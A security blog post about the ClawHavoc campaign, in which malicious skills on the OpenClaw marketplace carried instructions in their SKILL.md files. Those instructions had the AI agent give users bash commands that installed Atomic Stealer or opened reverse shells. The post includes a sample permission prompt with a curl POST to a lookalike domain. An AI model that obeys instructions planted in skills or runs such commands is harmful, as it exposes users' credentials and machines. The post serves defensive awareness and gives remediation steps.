The #1 Most Downloaded AI Skill Was Malware. Here's How 1,184 Poisoned Packages Slipped Past Everyone.

Hacker Noob Tips

Hacker Noob Tips

9 min read
The #1 Most Downloaded AI Skill Was Malware. Here's How 1,184 Poisoned Packages Slipped Past Everyone.

The ClawHavoc campaign is the most alarming AI supply chain attack to date — and most people still don't know it happened.

It started with a butler joke.

Imagine you hire a brilliant personal assistant. He manages your calendar, reads your messages, runs errands on your behalf. He has keys to everything — because that's what you hired him to do. Now imagine you come home one day to find the front door wide open, and your butler cheerfully serving tea to a stranger who wandered in off the street.

That's not a thought experiment. That's what happened to thousands of OpenClaw users in January and February 2026 — and the attacker left a receipt.

CISO Marketplace | Cybersecurity Services, Deals & Resources for Security Leaders
The premier marketplace for CISOs and security professionals. Find penetration testing, compliance assessments, vCISO services, security tools, and exclusive deals from vetted cybersecurity vendors.
Cybersecurity Services, Deals & Resources for Security Leaders

What Is OpenClaw?

OpenClaw (formerly Clawdbot, then Moltbot) is an open-source AI agent framework that's taken the developer community by storm. It racked up 145,000 GitHub stars in a matter of weeks, attracted 2 million visitors in a single week, and became one of the most viral AI projects of 2026.

The pitch is compelling. OpenClaw connects large language models — Claude, GPT, DeepSeek — to a persistent execution environment that can read your files, run terminal commands, send messages across Telegram, Slack, Discord, and WhatsApp, manage your calendar, browse the web, and remember everything across sessions. It's an autonomous digital employee running 24/7 on your machine.

The power comes from the architecture. OpenClaw agents operate with broad system permissions — full disk access, terminal access, OAuth tokens to every service you've connected. That's by design. You can't have a useful autonomous agent without giving it capability.

But capability without security is an open door. And the attackers walked right through it.

ClawHub: npm for AI Agents

To extend what OpenClaw can do, users install "skills" — modular packages from ClawHub, the official community marketplace. Think of it exactly like npm for JavaScript, or PyPI for Python. Want your agent to track crypto wallets? There's a skill. Summarize YouTube videos? Skill. Trade on Polymarket, pull Google Calendar, scrape X? Skills, skills, skills.

The value proposition is obvious. Install a package, gain a superpower. The whole ecosystem is one command: clawhub install skill-name.

And therein lies the problem.

ClawHub allowed anyone to publish a skill. The only restriction: your GitHub account needed to be at least one week old. That's it. No code review. No static analysis. No vetting of what those skills actually instruct the AI to do.

The attackers noticed.

ClawHavoc: How 1,184 Malicious Skills Flooded the Marketplace

Security researchers at Koi Security conducted a full audit of ClawHub in late January 2026. Of 2,857 skills available at the time, they identified 341 malicious entries. Of those, 335 were traced to a single coordinated campaign — now tracked as ClawHavoc.

The number kept climbing. By February 16, 2026, updated scans confirmed over 824 malicious skills across an expanded registry of 10,700+ packages. Bitdefender's independent analysis placed the figure closer to 900 — roughly 20% of the entire ecosystem. The most comprehensive count, from Cyberpress, reached 1,184 confirmed malicious skills.

One attacker, operating under the handle Hightower6eu, uploaded a staggering 354 malicious packages alone. Other actors used automated deployment scripts — Sakaen736jih was observed submitting new malicious skills every few minutes. Some used compromised legitimate GitHub accounts to add an air of authenticity. The handle aslaep123 was a deliberate typosquat of the legitimate user asleep123.

This wasn't opportunistic. This was an organized operation.

The Attack Chain: How Your AI Agent Was Turned Against You

The ClawHavoc playbook is elegant in its simplicity. Here's how it worked, step by step.

Step 1: The Poisoned SKILL.md

Every OpenClaw skill contains a SKILL.md file — the manifest the AI reads to understand what the skill does and how to execute it. Legitimate skills use this to define behavior. Malicious skills weaponized it.

Attackers crafted professional-looking documentation for skills disguised as high-demand tools:

  • solana-wallet-tracker
  • youtube-summarize-pro
  • polymarket-trader
  • polymarket-all-in-one
  • yahoo-finance-pro
  • x-trends-tracker
  • gmail-manager
  • auto-updater-agent

The documentation looked legitimate. The category fit user demand. The README was polished. Nothing looked wrong on the surface — because the ClawHub UI only shows users the visible SKILL.md content. Referenced files, hidden logic files, and additional payloads don't surface in the web interface.

The AI reads everything. Users typically read none of it.

Step 2: Social Engineering via "Prerequisites"

The SKILL.md files included a "Prerequisites" section with a ClickFix-style prompt. The AI agent was instructed to tell users something like this:

"To enable this feature, please run:"

That single command — piped directly to bash — was the payload delivery mechanism. On macOS, it installed Atomic Stealer (AMOS), one of the most capable credential-theft tools currently in circulation.

Step 3: The Harvest

Once Atomic Stealer landed, it went to work immediately. It extracted:

  • Browser passwords and cookies from Chrome, Safari, Firefox, and Brave
  • SSH keys from ~/.ssh/
  • Telegram session files
  • Crypto wallet credentials and seed phrases
  • The entire macOS Keychain
  • Every API key stored in .env files
  • OpenClaw's own configuration file at ~/.clawdbot/.env, containing API keys for every connected service

On other systems, some skills skipped the stealer entirely and opened a reverse shell — giving the attacker full remote control over the victim's machine. Persistent. Silent. Invisible to the user. One skill, operating as a fake Polymarket bot, established an interactive shell back to the attacker's server and maintained it indefinitely.

A fake "weather assistant" skill, flagged separately, exfiltrated the OpenClaw .env configuration file to a webhook.site endpoint. Those API keys then gave attackers full remote control over the victim's entire OpenClaw deployment and every service connected to it.

The #1 Downloaded Skill Was Scanned by Cisco. Here's What They Found.

Before ClawHavoc was even named, independent researcher Jamieson O'Reilly published a two-part investigation demonstrating exactly how the trust model could be exploited. In a widely-read thread (860K views), he described creating a backdoored skill called "What Would Elon Do?" (/wed), gaming it to the #1 position on ClawHub by exploiting a trivially unauthenticated download counter with spoofed X-Forwarded-For headers, and watching as 16 real developers in 7 countries executed arbitrary commands on their machines within 8 hours.

O'Reilly's proof-of-concept was deliberately benign — a ping to a server he controlled, proving execution without stealing anything. But it was the principle he was demonstrating, not the payload.

"In the hands of someone less scrupulous, those developers would have had their SSH keys, AWS credentials, and entire codebases exfiltrated before they knew anything was wrong."Part I | Part II

When Cisco's AI Defense team ran their Skill Scanner against the #1 ranked skill on ClawHub — the "What Would Elon Do?" skill that had been gamed to the top position — they found 9 security vulnerabilities. Two were critical. The skill silently exfiltrated data to attacker-controlled servers and used direct prompt injection to bypass safety guidelines. It had been downloaded thousands of times.

Why the Permission Model Doesn't Protect You

OpenClaw shows users a permission prompt before executing commands:

Claude wants to run: curl -s -X POST "https://clawdhub-skill.com/log" ...
[Allow] [Deny]

In theory, users can inspect each command and deny suspicious ones. In practice, this model fails for several reasons that are worth understanding.

Every useful interaction requires Allow clicks. After 50 legitimate approvals in a session, the 51st gets no scrutiny. The skill author controls what appears in the prompt — the command shown is exactly what they chose to display. A curl to a domain containing "clawhub" looks like telemetry for a skill you just installed. whoami or hostname looks routine. Users have no baseline to distinguish expected behavior from intrusion.

The combined effect: a permission model that creates an illusion of control while providing almost none.

This Is npm 2018 All Over Again — Except the Package Can Think

If you've followed security news for more than a few years, the pattern is familiar.

In 2018, an attacker gained maintainer access to event-stream, a JavaScript package with 1.5 million weekly downloads, and hid a malicious dependency inside it for months. In October 2021, ua-parser-js — with over 7 million weekly downloads and used by Facebook's own fbjs package — was compromised when attackers hijacked the maintainer's account and published versions containing cryptominers and credential stealers.

The same dynamics apply to ClawHub. Except there's a critical difference.

When a malicious npm package runs, it executes code. When a malicious ClawHub skill runs, it instructs an AI agent with autonomous decision-making capability and broad system access to execute code — and the AI has already been granted full disk access, terminal permissions, and OAuth tokens to your email, calendar, messaging apps, and cloud services.

The package can think. It has root access to your life. And it was installed voluntarily because the download count said 4,000+ and the README looked professional.

As IBM Research Scientist Kaoutar El Maghraoui put it: "A highly capable agent without proper safety controls can end up creating major vulnerabilities, especially if it is used in a work context."

The Enterprise Problem Nobody Is Talking About

Bitdefender's telemetry surfaced something deeply uncomfortable: OpenClaw isn't just a personal tinkering tool anymore. Employees are deploying it on corporate machines — using single-line install commands, granting full disk access to bypass setup friction, and connecting it to corporate Slack, Gmail, and cloud infrastructure.

Shadow AI. Broad permissions. Malicious skills in the marketplace.

The attack surface writes itself.

Microsoft's security blog put it plainly: installing a ClawHub skill is functionally equivalent to installing privileged code on a machine. Treating it as anything less is a miscalculation.

The Structural Problem

The ClawHavoc campaign is notable not for technical sophistication but for exposing fundamental architectural weaknesses that patches alone won't fix.

No content vetting. Skills can instruct Claude to do anything. There is no static analysis, no behavioral sandbox, no review process. Whatever markdown you upload becomes instructions the AI will follow.

Trust signals are manufactured. Download counts were trivially inflatable via the unauthenticated endpoint. Publisher identity required only a week-old GitHub account. Popularity and legitimacy are indistinguishable from fraud.

The UI hides what matters. ClawHub's web interface surfaces the visible SKILL.md content. Referenced files — where the actual payload logic lives — stay hidden. Users would need to manually inspect installed skill directories to see what they're actually running. History suggests almost nobody does.

OpenClaw's creator Peter Steinberger has since added a community reporting feature (skills with 3+ unique reports are auto-hidden) and, as of February 14, 2026, announced he's joining OpenAI as the OpenClaw Foundation with OpenAI's financial and technical support. Multiple CVEs have been patched (CVE-2026-25253, CVE-2026-25157, CVE-2026-24763, CVE-2026-25593, CVE-2026-25475). The latest version as of this writing is 2026.2.17 with no known unfixed CVEs.

But the architecture still places enormous trust in community content with minimal verification infrastructure. That's a policy problem, not just a bug.

What You Should Do Right Now

If you use OpenClaw:

  1. Rotate every credential that OpenClaw has ever had access to. API keys, OAuth tokens, bot credentials, everything.
  2. Check ~/.clawdbot/.env and verify it hasn't been exfiltrated.
  3. Audit ~/.claude/skills/ — read every file in every installed skill directory. Search for curl, wget, bash, and backtick commands.
  4. Look for unusual processes, cron jobs, entries in ~/.ssh/authorized_keys, or outbound connections to webhook.site or unknown domains.
  5. Treat download counts as meaningless. Stars and installs from authenticated users are marginally better signals. The reputation of the publisher matters more than any ranking.
  6. Never copy-paste terminal commands from a skill's documentation or README without understanding exactly what they do.

If you run enterprise infrastructure:

Block clawhub install on corporate devices until you have visibility into what's being installed. Monitor for process execution patterns consistent with OpenClaw. Microsoft's security blog provides KQL hunt queries for detecting ClawHub skill installs and surfacing rare skill slugs across your environment.

Alex Polyakov of Adversa AI has released SecureClaw, a free open-source tool that runs 55 automated audit and hardening checks against OpenClaw deployments, mapped to OWASP Agentic Security Initiative categories and MITRE ATLAS. It's available on GitHub and currently the most comprehensive defensive tooling purpose-built for this threat model.

The Bigger Picture

The butler is brilliant. He's not going away. The economics of autonomous AI agents make widespread adoption inevitable regardless of the security tradeoffs involved.

But we are rushing headfirst into a world where autonomous systems with significant capabilities — full disk access, shell execution, OAuth tokens to every connected service — are extended through community marketplaces with the same trust model as a free app store. The patterns that plagued npm for a decade are now operating inside tools that can think, decide, and act on your behalf.

The supply chain attack is the same. The blast radius is orders of magnitude larger.

If you're running agent infrastructure, the question isn't whether to use it. It's whether your security posture has caught up to what you've already deployed.

Check what's actually running. Audit what you've installed. Understand what you've traded away.

The front door might already be open.

Sources: Koi Security / The Hacker News, Bitdefender Labs, Cyberpress, SecurityWeek, Microsoft Security Blog, Conscia, Cisco Talos, eSecurity Planet, AuthMind, Jamieson O'Reilly @theonejvo

Read more